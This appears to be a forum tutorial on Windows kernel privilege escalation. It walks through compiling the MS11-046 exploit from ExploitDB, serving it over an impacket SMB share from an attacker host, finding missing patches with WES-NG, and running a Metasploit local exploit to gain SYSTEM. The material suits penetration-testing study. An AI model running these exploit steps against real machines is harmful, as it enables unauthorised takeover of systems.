x32x01

ADMINISTRATOR
As this series was dedicated to Windows Privilege escalation thus I’m writing this Post to explain command practice for kernel-mode exploitation.

Table of Content
  • What is a kernel?
  • Prerequisite
  • Hunting Vulnerable Kernel
  • Kernel Privilege Escalation Techniques
    • Kernel Exploit Using Metasploit
    • Kernel Exploit Using ExploitDB

What is a kernel?​

A kernel is a computer program that serves as the core or heart of an operating system. It manages memory management, task management, and disk management.

3.png

An operating system has the following separated spaces:

  • Kernel Space: A kernel is typically maintained and loaded into a distinct memory region referred to as protected Kernel space. It is secured against access by application programs or less critical components of the operating system.
  • User Space: The operating system (OS) is the software that acts as a bridge between hardware components and the end-user. User-space memory is used by application programs such as a browser, word processor, and audio and video player.

Kernel Privilege Escalation Techniques​

A privilege escalation vulnerability exists in the Windows kernel on the remote host. If exploited successfully, a locally authorized attacker might execute a specially built kernel-mode program and take control of the machine.

Tactics: Privilege Escalation
Platforms: Windows

Prerequisite
Target Machine: Windows 10
Attacker Machine: Kali Linux
Condition: Compromise the target machine with low privilege access either using Metasploit or Netcat, etc.
Objective: Escalate the NT Authority /SYSTEM privileges for a low privileged user by exploiting the kernel.

Hunting Vulnerable Kernel
An attacker will always look for privilege escalation if enumerate vulnerable kernel is built. This could possible by injecting python or PowerShell script. It enumerates based on build number and can return the CVE ID to easily exploit the machine and get Administrator. Access.

4.png

Kernel Exploit Using ExploitDB​

Once the attacker has a reverse connection, he may enumerate kernel built as highlighted in the below image.

5.png

This will help him to find out a related exploit if it is vulnerable.

6.png

For the related kernel version, we found it was vulnerable from MS11-046 (CVE: 2011-1249).

7.png

The same may be enumerated using searchsploit, which is also considered an offline version of ExploitDB. As illustrated below, we can download the same exploit from its offline version.

Code:
searchsploit 40564
i686-w64-mingw32-gcc 40564.c –o 40564.exe –lws2_32

8.png

Let’s start SMB Share service in a new terminal with the help of impacket python script as given below:
Code:
impacket-smbserver share $(pwd)

9.png

This will help us to import exploit inside compromised shells with the help of the copy command:
Code:
copy \\192.168.1.3\share\40564.exe

Once the exploit will be downloaded we can execute this program to obtain a privilege shell as NT Authority/system.

10.png

Kernel Exploit Using Metasploit​

Once you have enumerated kernel built you can use Google to get available exploit whereas you can download Windows Exploit Suggester – Next Generation (WES-NG) in your kali Linux that will hunt available exploit for vulnerable kernel built. You can download this script from the Github library.

Code:
git clone https://github.com/bitsadmin/wesng
cd wesng

Note: There are two options to check for missing patches: a. Launch missingkbs.vbs on the host to have Windows determine which patches are missing b. Use Windows’ built-in systeminfo.exe tool to obtain the system information of the local system, or from a remote system using systeminfo /S MyRemoteHost, and redirect this to a file: systeminfo > systeminfo.txt

11.png

Since we have saved the output systeminfo in a text file and named it systeminfo.txt. Further, we used this information for running the wes.py script
Code:
python wes.py /root/systeminfo.txt

12.png

As result, it will try to determine missing patches and report available vulnerability and Risk Impact. From the given below image, you can observe it has a pointed link for exploit available on exploit db.

13.png

This time we will use Metasploit for post-exploitation and look for privilege shell with NT Authority Privileges.

Code:
use exploit/windows/local/ms16_014_wmi_rec_notif
set session 1
exploit

On successful execution, it will give shell for Administrative Privileges.

15.png
 
Top